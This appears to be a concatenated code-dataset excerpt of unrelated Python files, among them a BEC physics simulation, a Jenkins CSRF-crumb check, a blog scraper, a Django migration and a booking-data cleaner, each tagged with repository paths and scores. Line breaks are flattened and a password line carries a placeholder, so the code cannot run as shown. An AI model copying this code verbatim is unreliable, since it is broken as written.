len(numeric_mask) return zip(output_tokens, numeric_values, numeric_mask) def _is_whitespace(char): """Checks whether `chars` is a whitespace character.""" # \t, \n, and \r are technically contorl characters but we treat them # as whitespace since they are generally considered as such. if char == " " or char == "\t" or char == "\n" or char == "\r": return True cat = unicodedata.category(char) if cat == "Zs": return True return False def _is_control(char): """Checks whether `chars` is a control character.""" # These are technically control characters but we count them as whitespace # characters. if char == "\t" or char == "\n" or char == "\r": return False cat = unicodedata.category(char) if cat.startswith("C"): return True return False def _is_punctuation(char): """Checks whether `chars` is a punctuation character.""" cp = ord(char) # We treat all non-letter/number ASCII as punctuation. # Characters such as "^", "$", and "`" are not in the Unicode # Punctuation class but we treat them as punctuation anyways, for # consistency. if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)): return True cat = unicodedata.category(char) # if cat.startswith("P") and cp != 46: if cat.startswith("P"): return True return False ################ # Small = { 'zero': 0.0, 'one': 1.0, 'two': 2.0, 'three': 3.0, 'four': 4.0, 'five': 5.0, 'six': 6.0, 'seven': 7.0, 'eight': 8.0, 'nine': 9.0, 'ten': 10.0, 'eleven': 11.0, 'twelve': 12.0, 'thirteen': 13.0, 'fourteen': 14.0, 'fifteen': 15.0, 'sixteen': 16.0, 'seventeen': 17.0, 'eighteen': 18.0, 'nineteen': 19.0, 'twenty': 20.0, 'thirty': 30.0, 'forty': 40.0, 'fifty': 50.0, 'sixty': 60.0, 'seventy': 70.0, 'eighty': 80.0, 'ninety': 90.0 } Magnitude = { 'thousand': 1000.0, 'million': 1000000.0, 'billion': 1000000000.0, 'trillion': 1000000000000.0, 'quadrillion': 1000000000000000.0, 'quintillion': 1000000000000000000.0, 'sextillion': 1000000000000000000000.0, 'septillion': 1000000000000000000000000.0, 'octillion': 1000000000000000000000000000.0, 'nonillion': 1000000000000000000000000000000.0, } class NumberException(Exception): def __init__(self, msg): Exception.__init__(self, msg) def text2num(sent): if type(sent) is str: words = [word.lower() for word in sent.strip().split()] elif type(sent) is list: words = [word.lower() for word in sent] # n = 0 # g = 0 mantissa = 0 # number = 0.0 for i, word in enumerate(words): if i == 0: mantissa = Small.get(word, None) if mantissa is None: try: mantissa = float(word) except ValueError: raise NumberException("First must be a number of sorts") elif i != 0: magnitude = Magnitude.get(word, None) if magnitude is not None: mantissa = mantissa*magnitude else: # non-number word raise NumberException("Unknown number: "+word) return mantissa def generate_ngrams(sentence, n): return zip(*[sentence[i:] for i in range(n)]) def check_int(s): if s[0] in ('-', '+'): return s[1:].isdigit() return s.isdigit() def preprocess(sent, remove_pos=False, never_split=None): """ Preprocess the sentence by: . remove commas from numbers (2,000 -> 2000) . remove endings from ordinal numbers (2nd -> 2) . convert "a {hundred,thousand...}" to "one {hundred,thousand,...}" so it can be handled by text2num function . convert "digit digitword" (24 hundred) -> 2400 and return the sentence's preprocessed list of words that should be passed into text2num. """ if remove_pos: words = [word[:word.rfind('_')] for word in sent.strip().split()] else: words = [word for word in sent.strip().split()] tokenizer = BasicTokenizer(do_lower_case=True, never_split=never_split) words = tokenizer.tokenize(sent) # sent = ' '.join(tokens) words_lower = [word.lower() for word in words] # remove commas from numbers "2,000" -> 2000 and remove endings from ordinal numbers for i in range(len(words)): new_word = words_lower[i].replace(',', '') if new_word.endswith(('th', 'rd', 'st', 'nd')): new_word = new_word[:-2] try: if new_word not in ['infinity', 'inf', 'nan']: int_word = float(new_word) # words[i] = str(int_word) words[i] = new_word except ValueError: pass # only modify this word if it's an int after preprocessing Magnitude_with_hundred = Magnitude.copy() Magnitude_with_hundred['hundred'] = 100 # convert "a {hundred,thousand,million,...}" to "one {hundred,thousand,million,...}" for i in range(len(words)-1): if words_lower[i] == 'a' and words_lower[i+1] in Magnitude_with_hundred: words[i] = 'one' # convert "24 {Magnitude}" -> 24000000000000 (mix of digits and words) new_words = [] sigs = [] i = 0 while i < len(words)-1: if check_int(words_lower[i]) and words_lower[i+1] in Magnitude_with_hundred: new_words.append(str(float(words_lower[i]) * Magnitude_with_hundred[words_lower[i+1]])) sigs.append(f'{words_lower[i]} {words_lower[i+1]}') i += 1 else: new_words.append(words[i]) sigs.append('') if i == len(words) - 2: new_words.append(words[i+1]) sigs.append('') i += 1 return new_words, sigs # ​ # def normalize_numbers_in_sent(sent, remove_pos=False, never_split=None): """ Given a sentence, perform preprocessing and normalize number words to digits. :param sent: sentence (str) :return: a list of normalized words from the sentence """ out_words = [] words, sigfigs = preprocess(sent, remove_pos, never_split) out_sigfigs = [] i = 0 while i < len(words): for j in range(len(words), i, -1): try: number = str(text2num(words[i:j])) if sigfigs[i] == '': out_sigfigs.append(' '.join(words[i:j])) else: out_sigfigs.append(sigfigs[i]) out_words.append(number) i = j-1 # skip this sequence since we replaced it with a number break except NumberException: if j == i+1: out_sigfigs.append('-1') out_words.append(words[i]) i += 1 assert len(out_sigfigs) == len(out_words) return out_words, out_sigfigs
1.867188
2
dipole/splitting_dipole.py
wheelerMT/spin-1_BEC
0
5538
<gh_stars>0 import numpy as np import multiprocessing as mp import pyfftw from numpy import pi, exp, sqrt, sin, cos, conj, arctan, tanh, tan from numpy import heaviside as heav from include import helper import h5py # ---------Spatial and potential parameters-------------- Mx = My = 64 Nx = Ny = 128 # Number of grid pts dx = dy = 1 / 2 # Grid spacing dkx = pi / (Mx * dx) dky = pi / (My * dy) # K-space spacing len_x = Nx * dx # Box length len_y = Ny * dy x = np.arange(-Mx, Mx) * dx y = np.arange(-My, My) * dy X, Y = np.meshgrid(x, y) # Spatial meshgrid data = h5py.File('../data/splitting_dipole_data.hdf5', 'a') data.create_dataset('grid/x', x.shape, data=x) data.create_dataset('grid/y', y.shape, data=y) kx = np.fft.fftshift(np.arange(-Mx, Mx) * dkx) ky = np.fft.fftshift(np.arange(-My, My) * dky) Kx, Ky = np.meshgrid(kx, ky) # K-space meshgrid # Initialising FFTs cpu_count = mp.cpu_count() wfn_data = pyfftw.empty_aligned((Nx, Ny), dtype='complex128') fft_forward = pyfftw.FFTW(wfn_data, wfn_data, axes=(0, 1), threads=cpu_count) fft_backward = pyfftw.FFTW(wfn_data, wfn_data, direction='FFTW_BACKWARD', axes=(0, 1), threads=cpu_count) # Framework for wavefunction data psi_plus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128') psi_0_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128') psi_minus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128') # Controlled variables V = 0. # Doubly periodic box p = q = 0. c0 = 2 c1 = 0.5 # Effective 3-component BEC k = 0 # Array index # ------------------------------ Generating SQV's ------------------------- # Euler angles alpha = 0. beta = pi / 4 gamma = 0. N_vort = 2 # Number of vortices pos = [-10, 0, 10, 0] theta_k = np.empty((N_vort, Nx, Ny)) theta_tot = np.empty((Nx, Ny)) for k in range(N_vort // 2): # Scaling positional arguments Y_minus = 2 * pi * (Y - pos[k]) / len_y X_minus = 2 * pi * (X - pos[N_vort // 2 + k]) / len_x Y_plus = 2 * pi * (Y - pos[N_vort + k]) / len_y X_plus = 2 * pi * (X - pos[3 * N_vort // 2 + k]) / len_x x_plus = 2 * pi * pos[3 * N_vort // 2 + k] / len_x x_minus = 2 * pi * pos[N_vort // 2 + k] / len_x for nn in np.arange(-5, 5): theta_k[k, :, :] += arctan( tanh((Y_minus + 2 * pi * nn) / 2) * tan((X_minus - pi) / 2)) \ - arctan(tanh((Y_plus + 2 * pi * nn) / 2) * tan((X_plus - pi) / 2)) \ + pi * (heav(X_plus, 1.) - heav(X_minus, 1.)) theta_k[k, :, :] -= (2 * pi * Y / len_y) * (x_plus - x_minus) / (2 * pi) theta_tot += theta_k[k, :, :] # Initial wavefunction Psi = np.empty((3, Nx, Ny), dtype='complex128') Psi[0, :, :] = np.zeros((Nx, Ny)) + 0j Psi[1, :, :] = np.ones((Nx, Ny), dtype='complex128') * exp(1j * theta_tot) Psi[2, :, :] = np.zeros((Nx, Ny)) + 0j psi_plus, psi_0, psi_minus = helper.rotation(Psi, Nx, Ny, alpha, beta, gamma) # Performs rotation to wavefunction # Aligning wavefunction to potentially speed up FFTs pyfftw.byte_align(psi_plus) pyfftw.byte_align(psi_0) pyfftw.byte_align(psi_minus) # ------------------------------------------------------------------------ # Normalisation constants N_plus = dx * dy * np.linalg.norm(psi_plus) ** 2 N_0 = dx * dy * np.linalg.norm(psi_0) ** 2 N_minus = dx * dy * np.linalg.norm(psi_minus) ** 2 # Time steps, number and wavefunction save variables Nt = 80000 Nframe = 200 dt = 5e-3 t = 0. # Saving time variables: data.create_dataset('time/Nt', data=Nt) data.create_dataset('time/dt', data=dt) data.create_dataset('time/Nframe', data=Nframe) # Setting up variables to be sequentially saved: psi_plus_save = data.create_dataset('wavefunction/psi_plus', (Nx, Ny, Nt/Nframe), dtype='complex128') psi_0_save = data.create_dataset('wavefunction/psi_0', (Nx, Ny, Nt/Nframe), dtype='complex128') psi_minus_save = data.create_dataset('wavefunction/psi_minus', (Nx, Ny, Nt/Nframe), dtype='complex128') for i in range(Nt): # Spin vector terms: F_perp = sqrt(2.) * (conj(psi_plus) * psi_0 + conj(psi_0) * psi_minus) Fz = abs(psi_plus) ** 2 - abs(psi_minus) ** 2 F = sqrt(abs(Fz) ** 2 + abs(F_perp) ** 2) # Magnitude of spin vector # Total density n = abs(psi_minus) ** 2 + abs(psi_0) ** 2 + abs(psi_plus) ** 2 # Sin and cosine terms for solution C = cos(c1 * F * (-1j * dt)) if F.min() == 0: S = np.zeros((Nx, Ny), dtype='complex128') # Ensures no division by zero else: S = 1j * sin(c1 * F * (-1j * dt)) / F # Forward FFTs fft_forward(psi_plus, psi_plus_k) fft_forward(psi_0, psi_0_k) fft_forward(psi_minus, psi_minus_k) # Computing kinetic energy + quadratic Zeeman psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny) psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny) psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny) # Inverse FFTs fft_backward(psi_plus_k, psi_plus) fft_backward(psi_0_k, psi_0) fft_backward(psi_minus_k, psi_minus) # Rescaling psi_plus *= (Nx * Ny) psi_0 *= (Nx * Ny) psi_minus *= (Nx * Ny) # Trap, linear Zeeman & interaction flow psi_plus = ((C - S * Fz) * psi_plus - 1. / sqrt(2.) * S * conj(F_perp) * psi_0) * exp(-dt * (V - p + c0 * n)) psi_0 = (-1. / sqrt(2.) * S * F_perp * psi_plus + C * psi_0 - 1. / sqrt(2.) * S * conj(F_perp) * psi_minus) \ * exp(-dt * (V + c0 * n)) psi_minus = (-1. / sqrt(2.) * S * F_perp * psi_0 + (C + S * Fz) * psi_minus) * exp(-dt * (V + p + c0 * n)) # Forward FFTs fft_forward(psi_plus, psi_plus_k) fft_forward(psi_0, psi_0_k) fft_forward(psi_minus, psi_minus_k) # Computing kinetic energy + quadratic Zeeman psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny) psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny) psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny) # Inverse FFTs fft_backward(psi_plus_k, psi_plus) fft_backward(psi_0_k, psi_0) fft_backward(psi_minus_k, psi_minus) # Rescaling psi_plus *= (Nx * Ny) psi_0 *= (Nx * Ny) psi_minus *= (Nx * Ny) # Renormalizing wavefunction psi_plus *= sqrt(N_plus) / sqrt(dx * dy * np.linalg.norm(psi_plus) ** 2) psi_0 *= sqrt(N_0) / sqrt(dx * dy * np.linalg.norm(psi_0) ** 2) psi_minus *= sqrt(N_minus) / sqrt(dx * dy * np.linalg.norm(psi_minus) ** 2) # Prints current time and saves data to an array if np.mod(i, Nframe) == 0: print('it = %1.4f' % t) psi_plus_save[:, :, k] = psi_plus[:, :] psi_0_save[:, :, k] = psi_0[:, :] psi_minus_save[:, :, k] = psi_minus[:, :] k += 1 t += dt data.close()
1.890625
2
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
4
5539
from __future__ import print_function import requests import sys import os verbose=True try: username=os.environ['USERNAME'] password=<PASSWORD>['PASSWORD'] except: print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables") sys.exit(-1) jenkins_url=os.environ['JENKINS_URL'] url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' print(url) if username: crumb = requests.get(url, auth=(username, password)) if crumb.status_code == 200: crumb_headers = dict() crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1] if verbose: print("Got crumb: %s" % crumb.text) else: print("Failed to get crumb") print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:") print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm") print(jenkins_url + "/configureSecurity") sys.exit(-1)
2.515625
3
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
0
5540
# -*- coding: utf-8 -*- for i in range(int(raw_input())): x, y = [int(x) for x in raw_input().split()] if x > y: x, y = y, x x += 1 if x % 2 == 0 else 2 print sum([j for j in range(x, y, 2)])
3.453125
3
mock_file.py
MahirGulzar/fpointnet-tiny
0
5541
import tensorflow as tf FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0]) @tf.function def sample_data(points, labels, num_point): if tf.random.uniform(shape=()) >= 0.5: return points * FLIPPING_TENSOR, labels return points, labels mock_data = tf.constant([ [1., 2., 3.], [4., 5., 6.], [7., 8., 9.] ]) mock_labels = tf.constant([ [1.], [0.], [1.] ]) sampling_lambda = lambda x, y: sample_data(x, y, 512) train_data = tf.data.Dataset.from_tensors((mock_data, mock_labels)) \ .map(sampling_lambda) \ .unbatch() \ .batch(1) \ .repeat(5) for x, y in train_data: print(x)
2.71875
3
myapp.py
dataholiks/flask_heroku_scheduler
7
5542
from flask import Flask app = Flask(__name__) @app.route('/') def index(): return 'This is the app index page.'
2.265625
2
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
0
5543
# Generated by Django 3.1.6 on 2021-02-16 11:37 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('schedule', '0026_event'), ] operations = [ migrations.AlterField( model_name='group', name='students', field=models.ManyToManyField(blank=True, to='schedule.Student', verbose_name='Учні'), ), migrations.AlterField( model_name='teacher', name='subjects', field=models.ManyToManyField(blank=True, to='schedule.Subject', verbose_name='Предмети'), ), ]
1.523438
2
Blog.py
OliverChao/PyWhoAmI
0
5544
<gh_stars>0 import aiohttp import asyncio import time import time import argparse import glob import os import shutil import random import re import requests import sys from concurrent import futures import pdfkit import time from retrying import retry from pygments import highlight from pygments.lexers import guess_lexer, get_lexer_by_name from pygments.lexers import CppLexer from pygments.formatters.terminal import TerminalFormatter from pygments.util import ClassNotFound from pyquery import PyQuery as pq from requests.exceptions import ConnectionError from requests.exceptions import SSLError import numbers if sys.version < '3': import codecs from urllib import quote as url_quote from urllib import getproxies # Handling Unicode: http://stackoverflow.com/a/6633040/305414 def u(x): return codecs.unicode_escape_decode(x)[0] else: from urllib.request import getproxies from urllib.parse import quote as url_quote def u(x): return x scripFilePath = os.path.split(os.path.realpath(__file__))[0] PDF_DIR = os.path.join(scripFilePath,'whoamiPDFdir') CPP_DIR = os.path.join(scripFilePath,'whoamiCPPdir') class Result(object): def __init__(self, host, args): self.args = args self.host = host self._search_url = 'https://www.bing.com/search?q=site:{0}%20{1}' self._USER_AGENTS = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0', # 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0', ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) ' 'Chrome/19.0.1084.46 Safari/536.5'), ('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46' 'Safari/536.5'), ) self.data = self.whoami() def __call__(self, *args, **kwargs): return self.show_results() def __len__(self): return len(self.data) def whoami(self): self.args['query'] = ' '.join(self.args['query']).replace('?', '') try: return self.confirm_links() or 'Sorry, couldn\'t find any help with that topic\n' except (ConnectionError, SSLError): return 'Failed to establish network connection\n' def confirm_links(self): dic = self._get_dict(self.args['query']) if not dic: return False '''先不检验。。测试多个域名。。''' return dic # def _is_article(link): # return re.search('article/details/\d+', link) # # question_links = [link for link in links if _is_article(link)] # # https://blog.csdn.net/u013177568/article/details/62432761 # confirm_dict = {k: v for k, v in dic.items() if _is_article(v)} # return confirm_dict def _get_dict(self, query): search_url = self._search_url.format(self.host, url_quote(query)) # search_url : site:blog.csdn.net 1173 HDU result = self._get_result(search_url) html = pq(result) # return the anser_list return self._extract_links(html, 'bing') @retry(stop_max_attempt_number=3) def _get_result(self, url): try: return requests.get(url, headers={'User-Agent': random.choice(self._USER_AGENTS)}, ).text # verify = VERIFY_SSL_CERTIFICATE).text except requests.exceptions.SSLError as e: print('[ERROR] Encountered an SSL Error.\n') print('[*]retrying again automatically ') raise e def _extract_links(self, html, search_engine): if search_engine == 'bing': return self._extract_dict_from_bing(html) return None @staticmethod def _extract_dict_from_bing(html): html.remove_namespaces() dic = {} for a in html('.b_algo')('h2')('a'): # name ='[*{0}*] {1}'.format(str(num),a.text) name = a.text link = a.attrib['href'] dic[name] = str(link) # num+=1 return dic def show_results(self): if isinstance(self.data,str): print('[!!] ',self.data) return num = 0 for k, v in self.data.items(): print('[*{}*] '.format(str(num)), end='') print(k, end=' [*link*] ') print(v) num += 1 class Blog(Result): def __init__(self, host, args): super().__init__(host, args) self.links = list(self.data.values()) def show_code(self): url = list(self.data.values())[self.args['print']] main_page = self._parse_url(url) s = self._get_code(main_page, self.args) or 'sorry,this article has no code...' print(s) def save_to_pdf(self, url): html_template = u""" <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <!-- <center><h1>{title}</h1></center> --> {content} </body> </html> """ options = { 'page-size': 'Letter', 'margin-top': '0.75in', 'margin-right': '0.75in', 'margin-bottom': '0.75in', 'margin-left': '0.75in', 'encoding': "UTF-8", 'custom-header': [ ('Accept-Encoding', 'gzip') ], 'cookie': [ ('cookie-name1', 'cookie-value1'), ('cookie-name2', 'cookie-value2'), ], 'outline-depth': 10, } main_page = self._parse_url(url) title = main_page('h1').eq(0).text() title = re.sub('[<>\?\\\/:\*\s\[\]\(\)\-]', '.', title) html = html_template.format(title='Oliver loves Annabelle forever~', content=main_page.html()) if not os.path.exists(PDF_DIR): os.makedirs(PDF_DIR) filePath = os.path.join(PDF_DIR, title + '.pdf') if self._test_is_open_if_exists(filePath): return try: print('[*] save to ', filePath) self._save_to_pdf(html,filePath) print('[*] successfully ') except: print('[!!]要保存的网页可能有网页冲突') print('[注]保存html等语言的文档冲突的几率较大') print('[!!]save failed') print('[!!]如果事因为图片路径造成的保存失败,文字和代码部分则会正常生成pdf,') try: # 系统级命令好像try不到。。。 self.open_after_save(filePath) except: print('[!!]文件未打开,可能保存时发生IO错误。。') print('[!!]请重新生成pdf,或者,该网页的结构不符合生成pdf的标准') print('[~~]请见谅。。。。') @staticmethod def _save_to_pdf(html, filepath): wkhtmltopdf_path = scripFilePath + '/wkhtmltox/bin/wkhtmltopdf.exe' config = pdfkit.configuration(wkhtmltopdf=wkhtmltopdf_path) pdfkit.from_string(html, filepath, configuration=config) def open_after_save(self, pdf_path): if not self.args['open_pdf']: return try: if len(self.args['save']): return False except TypeError as e: pass # if args['pdf'] and PDFpath.split('.')[-1]!='pdf': # PDFpath += '.pdf' os.popen(pdf_path) def _test_is_open_if_exists(self, file_path): try: if len(self.args['save']): return False except TypeError as e: pass if self.args['open_pdf']: if os.path.exists(file_path): print('文件已经存在,直接打开') os.popen(file_path) return True else: return False def _parse_url(self, url): ''' :param url: 网页url :return: 返回网页的主要区域的pyquery ''' page = self._get_result(url) html = pq(page) # the main part of the article return html('.blog-content-box') def _get_code(self, main_page, args): ''' :param main_page:main_page=_parse_url(url) :param args: args :return: str ''' html = main_page('article')('pre')('code') or main_page('article')('pre') if not html: return None ans = [] ans_split = '\n' + '<==>' * 17 + '\n' if args['all_code']: for node in html: node = pq(node) s = node.html() # s=re.sub('</?[^>]+>','',s) s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s) s = s.replace('&gt;', '>').replace('&lt;', '<') ans.append(self._add_color(s, args)) else: node = pq(html[-1]) s = node.html() s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s) s = s.replace('&gt;', '>').replace('&lt;', '<') ans.append(self._add_color(s, args)) return ans_split.join(ans) @staticmethod def _add_color(code, args): if not args['color']: return code lexer = None try: lexer = guess_lexer(code) except ClassNotFound: return code return highlight(code, CppLexer(), TerminalFormatter(bg='dark')) def save_to_cpp(self): ans_split = '\n' + '<==>' * 17 + '\n' url = self.links[self.args['number_link']] main_page = self._parse_url(url) title = main_page('h1').eq(0).text() title = re.sub('[<>\?\\\/:\*\s]', '.', title) s = self._get_code(main_page, self.args) if not s: print('sorry , this article has no code...') print('please try another...') return if not os.path.exists(CPP_DIR): os.makedirs(CPP_DIR) filePath = os.path.join(CPP_DIR, title + '.cpp') if self._test_is_open_if_exists(filePath): return code = s.split(ans_split)[-1] with open(filePath, 'w')as f: f.write(code) print('[*]save successfully...') try: self.open_after_save(filePath) except: print('[!!]文件未打开,可能保存时发生IO错误。。') print('[!!]open failed')
2.125
2
corehq/apps/app_manager/tests/test_xml_parsing.py
dslowikowski/commcare-hq
1
5545
from django.test import SimpleTestCase as TestCase from corehq.apps.app_manager.models import _parse_xml import os class XMLParsingTest(TestCase): def testUnicodeError(self): """Tests a bug found in Unicode processing of a form""" file_path = os.path.join(os.path.dirname(__file__), "data", "unicode_error_form.xhtml") with open(file_path, "rb") as f: xml_data = f.read() try: _parse_xml(xml_data) # this should not raise an error except: self.fail("Parsing normal string data shouldn't fail!") try: _parse_xml(unicode(xml_data)) except: self.fail("Parsing unicode data shouldn't fail!")
2.75
3
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
0
5546
# input N, M = map(int, input().split()) Ds = [*map(int, input().split())] # compute dp = [False] * (N+1) for ni in range(N+1): if ni == 0: dp[ni] = True for D in Ds: if ni >= D: dp[ni] = dp[ni] or dp[ni-D] # output print("Yes" if dp[-1] else "No")
2.875
3
swapsort.py
ArshSood/sorting
0
5547
# sorting n=int(input()) array=list(map(int,input().split())) i=0 count=[] counter=0 while i<len(array): min=i start=i+1 while(start<len(array)): if array[start]<array[min]: min=start start+=1 if i!=min: array[i],array[min]=array[min],array[i] count.append(i) count.append(min) counter+=1 i+=1 print(counter) for i in range(0,len(count)): print(count[i],end=" ")
3.3125
3
tests/news_test.py
mucciz/News
0
5548
import unittest from app.models import News # News = news.News class NewsTest(unittest.TestCase): ''' Test Class to test the behaviour of the Movie class ''' def setUp(self): ''' Set up method that will run before every Test ''' self.new_news = News('abc-news','ABC NEWS','Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.','http://www.abc.net.au/news','business','au') def test_instance(self): self.assertTrue(isinstance(self.new_news,News)) def test_init(self): self.assertEqual(self.new_news.id,'abc-news') self.assertEqual(self.new_news.name,'ABC NEWS') self.assertEqual(self.new_news.description,'Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.') self.assertEqual(self.new_news.url,'http://www.abc.net.au/news') self.assertEqual(self.new_news.country,'au') # if __name__ == '__main__': # unittest.main()
3.75
4
test/get-gh-comment-info.py
MQasimSarfraz/cilium
1
5549
<gh_stars>1-10 import argparse parser = argparse.ArgumentParser() parser.add_argument('ghcomment', type=str) # this is for test-me-please phrases parser.add_argument('--focus', type=str, default="") parser.add_argument('--version', type=str, default="") parser.add_argument('--retrieve', type=str, default="focus") args = parser.parse_args() print args.__dict__[args.retrieve]
2.5625
3
preprocessing/booking.py
madcat1991/clustered_cars
0
5550
<gh_stars>0 """ This script cleans and prepares the data set of bookings for the future usage """ import argparse import logging import sys import pandas as pd from preprocessing.common import canonize_datetime, raw_data_to_df, check_processed_columns, check_data OLD_BREAKPOINT_MATCHER = { 2001: [ (1, 1, "New Year"), (1, 6, "Winter"), (2, 17, "Half Terms"), (2, 24, "Spring and Autumn"), (4, 7, "Easter"), (4, 21, "Spring and Autumn"), (5, 26, "SBH"), (6, 2, "Early Summer"), (7, 21, "Summer holidays"), (9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"), (10, 27, "Half Terms"), (11, 3, "Winter"), (12, 22, "Christmas"), (12, 29, "New Year"), ], 2002: [ (1, 1, "New Year"), (1, 5, "Winter"), (2, 16, "Half Terms"), (2, 23, "Spring and Autumn"), (4, 6, "Easter"), (4, 20, "Spring and Autumn"), (5, 25, "SBH"), (6, 1, "Early Summer"), (7, 20, "Summer holidays"), (8, 31, "Early Autumn"), (9, 14, "Spring and Autumn"), (10, 26, "Half Terms"), (11, 2, "Winter"), (12, 21, "Christmas"), (12, 28, "New Year"), ], 2003: [ (1, 1, "New Year"), (1, 4, "Winter"), (2, 15, "Half Terms"), (2, 22, "Spring and Autumn"), (4, 5, "Easter"), (4, 19, "Spring and Autumn"), (5, 24, "SBH"), (5, 31, "Early Summer"), (7, 19, "Summer holidays"), (8, 30, "Early Autumn"), (9, 13, "Spring and Autumn"), (10, 25, "Half Terms"), (11, 1, "Winter"), (12, 20, "Christmas"), (12, 27, "New Year"), ], 2004: [ (1, 1, "New Year"), (1, 3, "Winter"), (2, 14, "Half Terms"), (2, 21, "Spring and Autumn"), (4, 3, "Easter"), (4, 17, "Spring and Autumn"), (5, 22, "SBH"), (5, 29, "Early Summer"), (7, 17, "Summer holidays"), (8, 28, "Early Autumn"), (9, 11, "Spring and Autumn"), (10, 23, "Half Terms"), (10, 30, "Winter"), (12, 18, "Christmas"), ], 2005: [ (1, 1, "Winter"), (2, 12, "Half Terms"), (2, 19, "Spring and Autumn"), (4, 2, "Easter"), (4, 16, "Spring and Autumn"), (5, 21, "SBH"), (5, 28, "Early Summer"), (7, 16, "Summer holidays"), (8, 27, "Early Autumn"), (9, 10, "Spring and Autumn"), (10, 22, "Half Terms"), (10, 29, "Winter"), (12, 17, "Christmas"), (12, 31, "New Year"), ], 2006: [ (1, 1, "New Year"), (1, 7, "Winter"), (2, 18, "Half Terms"), (2, 25, "Spring and Autumn"), (4, 8, "Easter"), (4, 22, "Spring and Autumn"), (5, 27, "SBH"), (6, 3, "Early Summer"), (7, 22, "Summer holidays"), (9, 2, "Early Autumn"), (9, 16, "Spring and Autumn"), (10, 28, "Half Terms"), (11, 4, "Winter"), (12, 23, "Christmas"), (12, 30, "New Year"), ], 2007: [ (1, 1, "New Year"), (1, 6, "Winter"), (2, 17, "Half Terms"), (2, 24, "Spring and Autumn"), (4, 7, "Easter"), (4, 21, "Spring and Autumn"), (5, 26, "SBH"), (6, 2, "Early Summer"), (7, 21, "Summer holidays"), (9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"), (10, 27, "Half Terms"), (11, 3, "Winter"), (12, 22, "Christmas"), (12, 29, "New Year"), ], 2008: [ (1, 1, "New Year"), (1, 5, "Winter"), (2, 16, "Half Terms"), (2, 23, "Spring and Autumn"), (3, 22, "Easter"), (4, 19, "Spring and Autumn"), (5, 24, "SBH"), (5, 31, "Early Summer"), (7, 19, "Summer holidays"), (8, 30, "Early Autumn"), (9, 13, "Spring and Autumn"), (10, 25, "Half Terms"), (11, 1, "Winter"), (12, 20, "Christmas"), ], } COLS_TO_DROP = [ 'pname', 'region', 'sleeps', 'stars', 'proppostcode', # can be taken from property 'bookdate_scoreboard', 'book_year', 'hh_gross', 'hh_net', 'ho', # HH specific 'holidayprice', # correlates with avg_spend_per_head 'bighouse', 'burghisland', 'boveycastle', # no need 'sourcecostid', # is a pair of u'sourcedesc', u'category' 'drivedistance', # correlates with drivetime ] NOT_NA_COLS = [u'bookcode', u'code', u'propcode', u'year', u'breakpoint', u'avg_spend_per_head'] DATE_COLS = [u'bookdate', u'sdate', u"fdate"] FLOAT_COLS = [u'avg_spend_per_head', u'drivetime'] INT_COLS = [u'adults', u'babies', u'children', u'pets'] CATEGORICAL_COLS = [u'sourcedesc', u'category'] def get_breakpoint(dt): breakpoint = None matcher = OLD_BREAKPOINT_MATCHER.get(dt.year, []) for _m, _d, _b in matcher: if _m > dt.month or (_m == dt.month and _d > dt.day): break breakpoint = _b return breakpoint def fine_tune_df(df): logging.info(u"DF shape before fine tuning: %s", df.shape) averages = {col: df[col].dropna().mean() for col in FLOAT_COLS} zeros = {col: 0 for col in INT_COLS} most_popular_values = {col: df[col].value_counts().index[0] for col in CATEGORICAL_COLS} logging.info(u"Filling NA with average: %s", averages) df = df.fillna(averages) logging.info(u"Filling NA with zeros: %s", zeros) df = df.fillna(zeros) logging.info(u"Filling NA with most populars: %s", most_popular_values) df = df.fillna(most_popular_values) df[INT_COLS] = df[INT_COLS].astype(int) logging.info(u"Before cleaning NA: %s", df.shape) df = df.dropna(subset=NOT_NA_COLS) logging.info(u"After cleaning NA: %s", df.shape) if pd.isnull(df.values).any(): logging.error(u"NA values left in df") return df def fill_missed_breakpoints(df): df = df[pd.notnull(df.breakpoint) | pd.notnull(df.zone_name)] logging.info(u"Bookings having breakpoint or zone_name: %s", df.shape[0]) logging.info(u"Filling missing 